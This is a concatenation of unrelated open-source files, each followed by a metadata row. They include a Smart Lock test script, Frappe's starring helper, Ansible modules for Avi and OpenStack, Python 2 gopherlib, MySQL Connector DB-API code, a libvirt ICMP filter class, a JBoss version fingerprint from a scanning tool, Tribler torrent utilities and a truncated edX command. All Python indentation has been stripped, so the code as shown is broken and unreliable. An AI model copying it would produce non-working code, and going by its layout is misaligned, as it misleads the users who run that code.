logger.info('Unlocking for trial run...')
lock_screen = chromeos.GetAccountPickerScreen()
lock_screen.WaitForSmartLockState(
lock_screen.SmartLockState.AUTHENTICATED)
lock_screen.UnlockWithClick()
logger.info('Trial run success! Dismissing app...')
app.DismissApp()
def RunSetupTest(args):
logger.info('Starting test for %s at %s' % (
args.username, args.remote_address))
if args.app_path is not None:
logger.info('Replacing Smart Lock app with %s' % args.app_path)
chromeos = cros.ChromeOS(
args.remote_address, args.username, args.password, ssh_port=args.ssh_port)
with chromeos.Start(local_app_path=args.app_path):
logger.info('Chrome initialized')
# TODO(tengs): The access token is currently fetched from the Smart Lock
# app's background page. To be more robust, we should instead mint the
# access token ourselves.
if not CheckCryptAuthState(chromeos.cryptauth_access_token):
raise SmartLockSetupError('Failed to check CryptAuth state')
logger.info('Opening Smart Lock settings...')
settings = chromeos.GetSmartLockSettings()
assert(not settings.is_smart_lock_enabled)
if args.cryptauth_staging_url is not None:
chromeos.SetCryptAuthStaging(args.cryptauth_staging_url)
logger.info('Starting Smart Lock setup flow...')
app = settings.StartSetupAndReturnApp()
if app is None:
raise SmartLockSetupError('Failed to obtain set up app window')
_NavigateSetupDialog(chromeos, app)
def main():
logging.basicConfig()
logging.getLogger('proximity_auth').setLevel(logging.INFO)
args = ParseArgs()
RunSetupTest(args)
if __name__ == '__main__':
main()
| bsd-3-clause | 3,833,290,620,455,111,700 | 33.359281 | 80 | 0.70129 | false |
nerevu/frappe | frappe/desk/star.py | 38 | 1503 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""Allow adding of stars to documents"""
import frappe, json
from frappe.model.db_schema import add_column
@frappe.whitelist()
def toggle_star(doctype, name, add=False):
"""Adds / removes the current user in the `__starred_by` property of the given document.
If column does not exist, will add it in the database.
The `_starred_by` property is always set from this function and is ignored if set via
Document API
:param doctype: DocType of the document to star
:param name: Name of the document to star
:param add: `Yes` if star is to be added. If not `Yes` the star will be removed."""
_toggle_star(doctype, name, add)
def _toggle_star(doctype, name, add=False, user=None):
"""Same as toggle_star but hides param `user` from API"""
if not user:
user = frappe.session.user
try:
starred_by = frappe.db.get_value(doctype, name, "_starred_by")
if starred_by:
starred_by = json.loads(starred_by)
else:
starred_by = []
if add=="Yes":
if user not in starred_by:
starred_by.append(user)
else:
if user in starred_by:
starred_by.remove(user)
frappe.db.sql("""update `tab{0}` set `_starred_by`=%s where name=%s""".format(doctype),
(json.dumps(starred_by), name))
except Exception, e:
if e.args[0]==1054:
add_column(doctype, "_starred_by", "Text")
_toggle_star(doctype, name, add, user)
else:
raise
| mit | -17,695,761,688,688,134 | 27.358491 | 89 | 0.692615 | false |
robinro/ansible | lib/ansible/modules/network/avi/avi_healthmonitor.py | 43 | 6595 | #!/usr/bin/python
#
# Created on Aug 25, 2016
# @author: Gaurav Rastogi ([email protected])
# Eric Anderson ([email protected])
# module_check: supported
# Avi Version: 17.1.1
#
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_healthmonitor
author: Gaurav Rastogi ([email protected])
short_description: Module for setup of HealthMonitor Avi RESTful Object
description:
- This module is used to configure HealthMonitor object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent","present"]
description:
description:
- User defined description for the object.
dns_monitor:
description:
- Healthmonitordns settings for healthmonitor.
external_monitor:
description:
- Healthmonitorexternal settings for healthmonitor.
failed_checks:
description:
- Number of continuous failed health checks before the server is marked down.
- Allowed values are 1-50.
- Default value when not specified in API or module is interpreted by Avi Controller as 2.
http_monitor:
description:
- Healthmonitorhttp settings for healthmonitor.
https_monitor:
description:
- Healthmonitorhttp settings for healthmonitor.
monitor_port:
description:
- Use this port instead of the port defined for the server in the pool.
- If the monitor succeeds to this port, the load balanced traffic will still be sent to the port of the server defined within the pool.
- Allowed values are 1-65535.
- Special values are 0 - 'use server port'.
name:
description:
- A user friendly name for this health monitor.
required: true
receive_timeout:
description:
- A valid response from the server is expected within the receive timeout window.
- This timeout must be less than the send interval.
- If server status is regularly flapping up and down, consider increasing this value.
- Allowed values are 1-300.
- Default value when not specified in API or module is interpreted by Avi Controller as 4.
send_interval:
description:
- Frequency, in seconds, that monitors are sent to a server.
- Allowed values are 1-3600.
- Default value when not specified in API or module is interpreted by Avi Controller as 10.
successful_checks:
description:
- Number of continuous successful health checks before server is marked up.
- Allowed values are 1-50.
- Default value when not specified in API or module is interpreted by Avi Controller as 2.
tcp_monitor:
description:
- Healthmonitortcp settings for healthmonitor.
tenant_ref:
description:
- It is a reference to an object of type tenant.
type:
description:
- Type of the health monitor.
- Enum options - HEALTH_MONITOR_PING, HEALTH_MONITOR_TCP, HEALTH_MONITOR_HTTP, HEALTH_MONITOR_HTTPS, HEALTH_MONITOR_EXTERNAL, HEALTH_MONITOR_UDP,
- HEALTH_MONITOR_DNS, HEALTH_MONITOR_GSLB.
required: true
udp_monitor:
description:
- Healthmonitorudp settings for healthmonitor.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Uuid of the health monitor.
extends_documentation_fragment:
- avi
'''
EXAMPLES = '''
- name: Create a HTTPS health monitor
avi_healthmonitor:
controller: 10.10.27.90
username: admin
password: AviNetworks123!
https_monitor:
http_request: HEAD / HTTP/1.0
http_response_code:
- HTTP_2XX
- HTTP_3XX
receive_timeout: 4
failed_checks: 3
send_interval: 10
successful_checks: 3
type: HEALTH_MONITOR_HTTPS
name: MyWebsite-HTTPS
'''
RETURN = '''
obj:
description: HealthMonitor (api/healthmonitor) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
description=dict(type='str',),
dns_monitor=dict(type='dict',),
external_monitor=dict(type='dict',),
failed_checks=dict(type='int',),
http_monitor=dict(type='dict',),
https_monitor=dict(type='dict',),
monitor_port=dict(type='int',),
name=dict(type='str', required=True),
receive_timeout=dict(type='int',),
send_interval=dict(type='int',),
successful_checks=dict(type='int',),
tcp_monitor=dict(type='dict',),
tenant_ref=dict(type='str',),
type=dict(type='str', required=True),
udp_monitor=dict(type='dict',),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'healthmonitor',
set([]))
if __name__ == '__main__':
main()
| gpl-3.0 | -3,460,733,175,874,149,000 | 34.456989 | 157 | 0.638817 | false |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-2.0/Lib/gopherlib.py | 8 | 5634 | """Gopher protocol client interface."""
import string
# Default selector, host and port
DEF_SELECTOR = '1/'
DEF_HOST = 'gopher.micro.umn.edu'
DEF_PORT = 70
# Recognized file types
A_TEXT = '0'
A_MENU = '1'
A_CSO = '2'
A_ERROR = '3'
A_MACBINHEX = '4'
A_PCBINHEX = '5'
A_UUENCODED = '6'
A_INDEX = '7'
A_TELNET = '8'
A_BINARY = '9'
A_DUPLICATE = '+'
A_SOUND = 's'
A_EVENT = 'e'
A_CALENDAR = 'c'
A_HTML = 'h'
A_TN3270 = 'T'
A_MIME = 'M'
A_IMAGE = 'I'
A_WHOIS = 'w'
A_QUERY = 'q'
A_GIF = 'g'
A_HTML = 'h' # HTML file
A_WWW = 'w' # WWW address
A_PLUS_IMAGE = ':'
A_PLUS_MOVIE = ';'
A_PLUS_SOUND = '<'
_names = dir()
_type_to_name_map = {}
def type_to_name(gtype):
"""Map all file types to strings; unknown types become TYPE='x'."""
global _type_to_name_map
if _type_to_name_map=={}:
for name in _names:
if name[:2] == 'A_':
_type_to_name_map[eval(name)] = name[2:]
if _type_to_name_map.has_key(gtype):
return _type_to_name_map[gtype]
return 'TYPE=' + `gtype`
# Names for characters and strings
CRLF = '\r\n'
TAB = '\t'
def send_selector(selector, host, port = 0):
"""Send a selector to a given host and port, return a file with the reply."""
import socket
import string
if not port:
i = string.find(host, ':')
if i >= 0:
host, port = host[:i], string.atoi(host[i+1:])
if not port:
port = DEF_PORT
elif type(port) == type(''):
port = string.atoi(port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(selector + CRLF)
s.shutdown(1)
return s.makefile('rb')
def send_query(selector, query, host, port = 0):
"""Send a selector and a query string."""
return send_selector(selector + '\t' + query, host, port)
def path_to_selector(path):
"""Takes a path as returned by urlparse and returns the appropriate selector."""
if path=="/":
return "/"
else:
return path[2:] # Cuts initial slash and data type identifier
def path_to_datatype_name(path):
"""Takes a path as returned by urlparse and maps it to a string.
See section 3.4 of RFC 1738 for details."""
if path=="/":
# No way to tell, although "INDEX" is likely
return "TYPE='unknown'"
else:
return type_to_name(path[1])
# The following functions interpret the data returned by the gopher
# server according to the expected type, e.g. textfile or directory
def get_directory(f):
"""Get a directory in the form of a list of entries."""
import string
list = []
while 1:
line = f.readline()
if not line:
print '(Unexpected EOF from server)'
break
if line[-2:] == CRLF:
line = line[:-2]
elif line[-1:] in CRLF:
line = line[:-1]
if line == '.':
break
if not line:
print '(Empty line from server)'
continue
gtype = line[0]
parts = string.splitfields(line[1:], TAB)
if len(parts) < 4:
print '(Bad line from server:', `line`, ')'
continue
if len(parts) > 4:
if parts[4:] != ['+']:
print '(Extra info from server:',
print parts[4:], ')'
else:
parts.append('')
parts.insert(0, gtype)
list.append(parts)
return list
def get_textfile(f):
"""Get a text file as a list of lines, with trailing CRLF stripped."""
list = []
get_alt_textfile(f, list.append)
return list
def get_alt_textfile(f, func):
"""Get a text file and pass each line to a function, with trailing CRLF stripped."""
while 1:
line = f.readline()
if not line:
print '(Unexpected EOF from server)'
break
if line[-2:] == CRLF:
line = line[:-2]
elif line[-1:] in CRLF:
line = line[:-1]
if line == '.':
break
if line[:2] == '..':
line = line[1:]
func(line)
def get_binary(f):
"""Get a binary file as one solid data block."""
data = f.read()
return data
def get_alt_binary(f, func, blocksize):
"""Get a binary file and pass each block to a function."""
while 1:
data = f.read(blocksize)
if not data:
break
func(data)
def test():
"""Trivial test program."""
import sys
import getopt
opts, args = getopt.getopt(sys.argv[1:], '')
selector = DEF_SELECTOR
type = selector[0]
host = DEF_HOST
port = DEF_PORT
if args:
host = args[0]
args = args[1:]
if args:
type = args[0]
args = args[1:]
if len(type) > 1:
type, selector = type[0], type
else:
selector = ''
if args:
selector = args[0]
args = args[1:]
query = ''
if args:
query = args[0]
args = args[1:]
if type == A_INDEX:
f = send_query(selector, query, host)
else:
f = send_selector(selector, host)
if type == A_TEXT:
list = get_textfile(f)
for item in list: print item
elif type in (A_MENU, A_INDEX):
list = get_directory(f)
for item in list: print item
else:
data = get_binary(f)
print 'binary data:', len(data), 'bytes:', `data[:100]`[:40]
# Run the test when run as script
if __name__ == '__main__':
test()
| mit | 8,951,770,436,714,671,000 | 26.086538 | 88 | 0.526092 | false |
rupace10/mysql-connector-python | lib/mysql/connector/dbapi.py | 35 | 2330 | # MySQL Connector/Python - MySQL driver written in Python.
# Copyright (c) 2009, 2014, Oracle and/or its affiliates. All rights reserved.
# MySQL Connector/Python is licensed under the terms of the GPLv2
# <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>, like most
# MySQL Connectors. There are special exceptions to the terms and
# conditions of the GPLv2 as it is applied to this software, see the
# FOSS License Exception
# <http://www.mysql.com/about/legal/licensing/foss-exception.html>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
This module implements some constructors and singletons as required by the
DB API v2.0 (PEP-249).
"""
# Python Db API v2
apilevel = '2.0'
threadsafety = 1
paramstyle = 'pyformat'
import time
import datetime
from . import constants
class _DBAPITypeObject(object):
def __init__(self, *values):
self.values = values
def __eq__(self, other):
if other in self.values:
return True
else:
return False
def __ne__(self, other):
if other in self.values:
return False
else:
return True
Date = datetime.date
Time = datetime.time
Timestamp = datetime.datetime
def DateFromTicks(ticks):
return Date(*time.localtime(ticks)[:3])
def TimeFromTicks(ticks):
return Time(*time.localtime(ticks)[3:6])
def TimestampFromTicks(ticks):
return Timestamp(*time.localtime(ticks)[:6])
Binary = bytes
STRING = _DBAPITypeObject(*constants.FieldType.get_string_types())
BINARY = _DBAPITypeObject(*constants.FieldType.get_binary_types())
NUMBER = _DBAPITypeObject(*constants.FieldType.get_number_types())
DATETIME = _DBAPITypeObject(*constants.FieldType.get_timestamp_types())
ROWID = _DBAPITypeObject()
| gpl-2.0 | 8,646,486,502,092,094,000 | 30.066667 | 78 | 0.722747 | false |
tanglei528/nova | nova/tests/integrated/v3/test_server_usage.py | 31 | 1463 | # Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.tests.integrated.v3 import test_servers
class ServerUsageSampleJsonTest(test_servers.ServersSampleBase):
extension_name = 'os-server-usage'
def setUp(self):
"""setUp method for server usage."""
super(ServerUsageSampleJsonTest, self).setUp()
self.uuid = self._post_server()
def test_show(self):
response = self._do_get('servers/%s' % self.uuid)
subs = self._get_regexes()
subs['id'] = self.uuid
subs['hostid'] = '[a-f0-9]+'
self._verify_response('server-get-resp', subs, response, 200)
def test_details(self):
response = self._do_get('servers/detail')
subs = self._get_regexes()
subs['id'] = self.uuid
subs['hostid'] = '[a-f0-9]+'
self._verify_response('servers-detail-resp', subs, response, 200)
| apache-2.0 | -7,752,620,562,111,676,000 | 36.512821 | 78 | 0.660287 | false |
cloudnull/ansible-modules-core | cloud/openstack/os_auth.py | 9 | 2006 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
try:
import shade
from shade import meta
HAS_SHADE = True
except ImportError:
HAS_SHADE = False
DOCUMENTATION = '''
---
module: os_auth
short_description: Retrieve an auth token
version_added: "2.0"
description:
- Retrieve an auth token from an OpenStack Cloud
requirements:
- "python >= 2.6"
- "shade"
extends_documentation_fragment: openstack
'''
EXAMPLES = '''
# Authenticate to the cloud and retrieve the service catalog
- os_auth:
cloud: rax-dfw
- debug: var=service_catalog
'''
def main():
argument_spec = openstack_full_argument_spec()
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec, **module_kwargs)
if not HAS_SHADE:
module.fail_json(msg='shade is required for this module')
try:
cloud = shade.openstack_cloud(**module.params)
module.exit_json(
changed=False,
ansible_facts=dict(
auth_token=cloud.auth_token,
service_catalog=cloud.service_catalog))
except shade.OpenStackCloudException as e:
module.fail_json(msg=e.message)
# this is magic, see lib/ansible/module_common.py
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == '__main__':
main()
| gpl-3.0 | -2,372,976,840,638,432,000 | 28.5 | 72 | 0.6999 | false |
DanMcInerney/clusterd | src/platform/jboss/fingerprints/JBoss51.py | 8 | 1534 | from src.platform.jboss.interfaces import JINTERFACES
from cprint import FingerPrint
from requests import exceptions
from log import LOG
import utility
class FPrint(FingerPrint):
def __init__(self):
self.platform = "jboss"
self.version = "5.1"
self.title = JINTERFACES.WM
self.uri = "/admin-console/login.seam"
self.port = 8080
self.hash = None
def check(self, ip, port=None):
"""
"""
try:
rport = self.port if port is None else port
request = utility.requests_get("http://{0}:{1}{2}".format(
ip, rport, self.uri))
# JBoss 5.1 and 6.0 share images, so we can't fingerprint those, but
# we can check the web server version and a lack of a 6 in the AS title
if "JBoss AS Administration Console 1.2.0" in request.content and \
"JBoss AS 6 Admin Console" not in request.content:
return True
except exceptions.Timeout:
utility.Msg("{0} timeout to {1}:{2}".format(self.platform,
ip, rport),
LOG.DEBUG)
except exceptions.ConnectionError:
utility.Msg("{0} connection error to {1}:{2}".format(self.platform,
ip, rport),
LOG.DEBUG)
return False
| mit | 1,282,200,764,707,094,000 | 36.414634 | 83 | 0.498696 | false |
Captain-Coder/tribler | Tribler/Core/Utilities/torrent_utils.py | 1 | 4775 | from __future__ import absolute_import
import logging
import os
import libtorrent
from six import text_type
logger = logging.getLogger(__name__)
def commonprefix(l):
# this unlike the os.path.commonprefix version always returns path prefixes as it compares
# path component wise.
cp = []
ls = [p.split('/') for p in l]
ml = min(len(p) for p in ls)
for i in range(ml):
s = set(p[i] for p in ls)
if len(s) != 1:
break
cp.append(s.pop())
return os.path.sep.join(cp)
def create_torrent_file(file_path_list, params):
fs = libtorrent.file_storage()
# filter all non-files
file_path_list_filtered = []
for path in file_path_list:
if not os.path.exists(path):
raise IOError('Path does not exist: %s' % path)
elif os.path.isfile(path):
file_path_list_filtered.append(path)
# get the directory where these files are in. If there are multiple files, take the common directory they are in
if len(file_path_list_filtered) == 1:
base_path = os.path.split(file_path_list_filtered[0])[0]
else:
base_path = os.path.abspath(commonprefix(file_path_list_filtered))
# the base_dir directory is the parent directory of the base_path and is passed to the set_piece_hash method
base_dir = os.path.split(base_path)[0]
if len(file_path_list_filtered) == 1:
filename = os.path.basename(file_path_list_filtered[0])
fs.add_file(filename, os.path.getsize(file_path_list_filtered[0]))
else:
for full_file_path in file_path_list_filtered:
filename = os.path.join(base_path[len(base_dir) + 1:], full_file_path[len(base_dir):])[1:]
fs.add_file(filename, os.path.getsize(full_file_path))
if params.get('piece length'):
piece_size = params['piece length']
else:
piece_size = 0
flags = libtorrent.create_torrent_flags_t.optimize
# This flag doesn't exist anymore in libtorrent V1.1.0
if hasattr(libtorrent.create_torrent_flags_t, 'calculate_file_hashes'):
flags |= libtorrent.create_torrent_flags_t.calculate_file_hashes
torrent = libtorrent.create_torrent(fs, piece_size=piece_size, flags=flags)
if params.get('comment'):
torrent.set_comment(params['comment'])
if params.get('created by'):
torrent.set_creator(params['created by'])
# main tracker
if params.get('announce'):
torrent.add_tracker(params['announce'])
# tracker list
if params.get('announce-list'):
tier = 1
for tracker in params['announce-list']:
torrent.add_tracker(tracker, tier=tier)
tier += 1
# DHT nodes
# http://www.bittorrent.org/beps/bep_0005.html
if params.get('nodes'):
for node in params['nodes']:
torrent.add_node(*node)
# HTTP seeding
# http://www.bittorrent.org/beps/bep_0017.html
if params.get('httpseeds'):
torrent.add_http_seed(params['httpseeds'])
# Web seeding
# http://www.bittorrent.org/beps/bep_0019.html
if len(file_path_list) == 1:
if params.get('urllist', False):
torrent.add_url_seed(params['urllist'])
# read the files and calculate the hashes
if len(file_path_list) == 1:
libtorrent.set_piece_hashes(torrent, base_path)
else:
libtorrent.set_piece_hashes(torrent, base_dir)
t1 = torrent.generate()
torrent = libtorrent.bencode(t1)
postfix = u'.torrent'
if params.get('name'):
if not isinstance(params['name'], text_type):
params['name'] = unicode(params['name'], 'utf-8')
torrent_file_name = os.path.join(base_path, params['name'] + postfix)
else:
torrent_file_name = os.path.join(base_path, unicode(t1['info']['name'], 'utf-8') + postfix)
with open(torrent_file_name, 'wb') as f:
f.write(torrent)
return {'success': True,
'base_path': base_path,
'base_dir': base_dir,
'torrent_file_path': torrent_file_name}
def get_info_from_handle(handle):
# In libtorrent 0.16.18, the torrent_handle.torrent_file method is not available.
# this method checks whether the torrent_file method is available on a given handle.
# If not, fall back on the deprecated get_torrent_info
try:
if hasattr(handle, 'torrent_file'):
return handle.torrent_file()
return handle.get_torrent_info()
except AttributeError as ae:
logger.warning("No torrent info found from handle: %s", str(ae))
return None
except RuntimeError as e: # This can happen when the torrent handle is invalid.
logger.warning("Got exception when fetching info from handle: %s", str(e))
return None
| lgpl-3.0 | 2,500,792,797,343,158,300 | 33.601449 | 116 | 0.633508 | false |
rbian/avocado-vt | virttest/libvirt_xml/nwfilter_protocols/icmp.py | 26 | 6074 | """
icmp protocl support class(es)
http://libvirt.org/formatnwfilter.html#nwfelemsRulesProtoICMP
"""
from virttest.libvirt_xml import accessors, xcepts
from virttest.libvirt_xml.nwfilter_protocols import base
class Icmp(base.TypedDeviceBase):
"""
Create new Icmp xml instances
Properties:
attrs: libvirt_xml.nwfilter_protocols.Icmp.Attr instance
"""
__slots__ = ('attrs',)
def __init__(self, type_name='file', virsh_instance=base.base.virsh):
accessors.XMLElementNest('attrs', self, parent_xpath='/',
tag_name='icmp', subclass=self.Attr,
subclass_dargs={
'virsh_instance': virsh_instance})
super(Icmp, self).__init__(protocol_tag='icmp', type_name=type_name,
virsh_instance=virsh_instance)
def new_attr(self, **dargs):
"""
Return a new Attr instance and set properties from dargs
:param dargs: dict of attributes
:return: new Attr instance
"""
new_one = self.Attr(virsh_instance=self.virsh)
for key, value in dargs.items():
setattr(new_one, key, value)
return new_one
def get_attr(self):
"""
Return icmp attribute dict
:return: None if no icmp in xml, dict of icmp's attributes.
"""
try:
icmp_node = self.xmltreefile.reroot('/icmp')
except KeyError, detail:
raise xcepts.LibvirtXMLError(detail)
node = icmp_node.getroot()
icmp_attr = dict(node.items())
return icmp_attr
class Attr(base.base.LibvirtXMLBase):
"""
Icmp attribute XML class
Properties:
srcmacaddr: string, MAC address of sender
srcmacmask: string, Mask applied to MAC address of sender
dstmacaddr: string, MAC address of destination
dstmacmask: string, Mask applied to MAC address of destination
srcipaddr: string, Source IP address
srcipmask: string, Mask applied to source IP address
dstipaddr: string, Destination IP address
dstipmask: string, Mask applied to destination IP address
srcipfrom: string, Start of range of source IP address
srcipto: string, End of range of source IP address
dstipfrom: string, Start of range of destination IP address
dstipto: string, End of range of destination IP address
type: string, ICMP type
code: string, ICMP code
comment: string, text with max. 256 characters
state: string, comma separated list of NEW,ESTABLISHED,RELATED,INVALID or NONE
ipset: The name of an IPSet managed outside of libvirt
ipsetflags: flags for the IPSet; requires ipset attribute
"""
__slots__ = ('srcmacaddr', 'srcmacmask', 'dstmacaddr', 'dstmacmask',
'srcipaddr', 'srcipmask', 'dstipaddr', 'dstipmask',
'srcipfrom', 'srcipto', 'dstipfrom', 'dstipto',
'type', 'code', 'dscp', 'comment', 'state', 'ipset',
'ipsetflags')
def __init__(self, virsh_instance=base.base.virsh):
accessors.XMLAttribute('srcmacaddr', self, parent_xpath='/',
tag_name='icmp', attribute='srcmacaddr')
accessors.XMLAttribute('srcmacmask', self, parent_xpath='/',
tag_name='icmp', attribute='srcmacmask')
accessors.XMLAttribute('dstmacaddr', self, parent_xpath='/',
tag_name='icmp', attribute='dstmacaddr')
accessors.XMLAttribute('dstmacmask', self, parent_xpath='/',
tag_name='icmp', attribute='dstmacmask')
accessors.XMLAttribute('srcipaddr', self, parent_xpath='/',
tag_name='icmp', attribute='srcipaddr')
accessors.XMLAttribute('srcipmask', self, parent_xpath='/',
tag_name='icmp', attribute='srcipmask')
accessors.XMLAttribute('dstipaddr', self, parent_xpath='/',
tag_name='icmp', attribute='dstipaddr')
accessors.XMLAttribute('dstipmask', self, parent_xpath='/',
tag_name='icmp', attribute='dstipmask')
accessors.XMLAttribute('srcipfrom', self, parent_xpath='/',
tag_name='icmp', attribute='srcipfrom')
accessors.XMLAttribute('srcipto', self, parent_xpath='/',
tag_name='icmp', attribute='srcipto')
accessors.XMLAttribute('dstipfrom', self, parent_xpath='/',
tag_name='icmp', attribute='dstipfrom')
accessors.XMLAttribute('dstipto', self, parent_xpath='/',
tag_name='icmp', attribute='dstipto')
accessors.XMLAttribute('type', self, parent_xpath='/',
tag_name='icmp', attribute='type')
accessors.XMLAttribute('code', self, parent_xpath='/',
tag_name='icmp', attribute='code')
accessors.XMLAttribute('dscp', self, parent_xpath='/',
tag_name='icmp', attribute='dscp')
accessors.XMLAttribute('comment', self, parent_xpath='/',
tag_name='icmp', attribute='comment')
accessors.XMLAttribute('state', self, parent_xpath='/',
tag_name='icmp', attribute='state')
accessors.XMLAttribute('ipset', self, parent_xpath='/',
tag_name='icmp', attribute='ipset')
accessors.XMLAttribute('ipsetflags', self, parent_xpath='/',
tag_name='icmp', attribute='ipsetflags')
super(self.__class__, self).__init__(virsh_instance=virsh_instance)
self.xml = '<icmp/>'
| gpl-2.0 | -716,273,272,941,290,800 | 45.366412 | 86 | 0.552519 | false |
valdecdev/asterisk360 | asterisk360/models/asterisk360.py | 2 | 4474 | __author__ = 'les'
from openerp.osv import orm, fields
from openerp.tools.translate import _
class asterisk_server(orm.Model):
_inherit = "asterisk.server"
_columns = {
'ws_address': fields.char('Asterisk WebSocket Server Full Address or DNS', size=150, help="Full URI of the WebSockets Server including port e.g ws://<ip>:<port>")
}
class res_users(orm.Model):
_inherit = "res.users"
_columns = {
'asterisk_chan_type': fields.selection([
('SIP', 'SIP'),
('IAX2', 'IAX2'),
('DAHDI', 'DAHDI'),
('Zap', 'Zap'),
('Skinny', 'Skinny'),
('MGCP', 'MGCP'),
('mISDN', 'mISDN'),
('H323', 'H323'),
('USTM', 'USTM'),
('SCCP', 'SCCP'),
('Local','Local')], 'Asterisk channel type', help="Asterisk channel type, as used in the Asterisk dialplan. If the user has a regular IP phone, the channel type is 'SIP'."),
'screen_pop': fields.boolean('Screen Pop', help="Check to enable screen pops for this user"),
#'screen_pop_form': fields.one2many('ir.actions')
'log_calls': fields.boolean('Log Calls', help="Log calls for this user")
}
class res_partner(orm.Model):
_inherit = "res.partner"
_columns = {
'call_ids': fields.one2many('crm.phonecall', 'partner_id', 'Calls'),
}
def _get_caller_name(self, details):
person = details['contact_name'] if 'contact_name' in details else False
partner = details['partner_name'] if 'partner_name' in details else False
if person:
if partner and len(partner)>0:
return '%s (%s)' % (person, partner)
return person
if partner: return partner
return 'Unknown'
def setup_call_inbound(self, cr, uid, number, extension, context=None):
details = {
'extension': extension,
}
res = self.get_partner_from_phone_number(cr, uid, number, context=context)
if res:
details['contact_id'] = res[0]
details['contact_name'] = res[2]
details['parent_id'] = res[1]
details['parent_name'] = '%s' % self.read(cr, uid, res[1],['name'])['name'] if res[1] else ""
# if we want to record the calls
details['openerp_call_id'] = self.create_inbound_call(cr, uid, details, number, context)
return details
def create_inbound_call(self, cr, uid, details, inbound_number, context):
inbound_category_id = self.pool.get('crm.case.categ').search(cr, uid, [('name', '=', 'Inbound')])
return self.create_call(cr, uid, details, inbound_number, inbound_category_id, context)
def create_call(self, cr, uid, details, number, category_id, context={}):
vals = {
'name': '%s %s' % (self._get_caller_name(details),_('Inbound')),
'partner_phone': number,
'categ_id': category_id[0],
}
if 'extension' in details:
user_obj = self.pool.get('res.users')
search_results = user_obj.search(cr, uid, [('internal_number','=',details['extension'])])
if len(search_results)>0:
vals['user_id'] = search_results[0]
ret = user_obj.read(cr, uid, vals['user_id'],['context_section_id','log_calls'])
if not ret['log_calls']: return
if 'context_section_id' in ret:
section_id = ret['context_section_id']
vals['section_id'] = section_id[0]
if 'contact_id' in details: vals['partner_id'] = details['contact_id']
call_object = self.pool.get('crm.phonecall')
if not context:
context={}
context['mail_create_nosubscribe'] = True
call_id = call_object.create(cr, uid, vals, context)
if 'user_id' in vals:
call_object.message_subscribe_users(cr, uid, [call_id], [vals['user_id']])
call_object.case_open(cr, uid, [call_id])
return call_id
| agpl-3.0 | 3,636,015,768,797,953,000 | 41.207547 | 224 | 0.506482 | false |
procangroup/edx-platform | lms/djangoapps/certificates/management/commands/regenerate_user.py | 15 | 5358 | """Django management command to force certificate regeneration for one user"""
import copy
import logging
from django.contrib.auth.models import User
from django.core.management.base import BaseCommand
from opaque_keys.edx.keys import CourseKey
from six import text_type
from badges.events.course_complete import get_completion_badge
from badges.utils import badges_enabled
from lms.djangoapps.certificates.api import regenerate_user_certificates
from xmodule.modulestore.django import modulestore
LOGGER = logging.getLogger(__name__)
class Command(BaseCommand):
"""
Management command to recreate the certificate for
a given user in a given course.
"""
help = """Put a request on the queue to recreate the certificate for a particular user in a particular course."""
def add_arguments(self, parser):
parser.add_argument('-n', '--noop',
action='store_true',
dest='noop',
help="Don't grade or add certificate requests to the queue")
parser.add_argument('--insecure',
action='store_true',
dest='insecure',
help="Don't use https for the callback url to the LMS, useful in http test environments")
parser.add_argument('-c', '--course',
metavar='COURSE_ID',
dest='course',
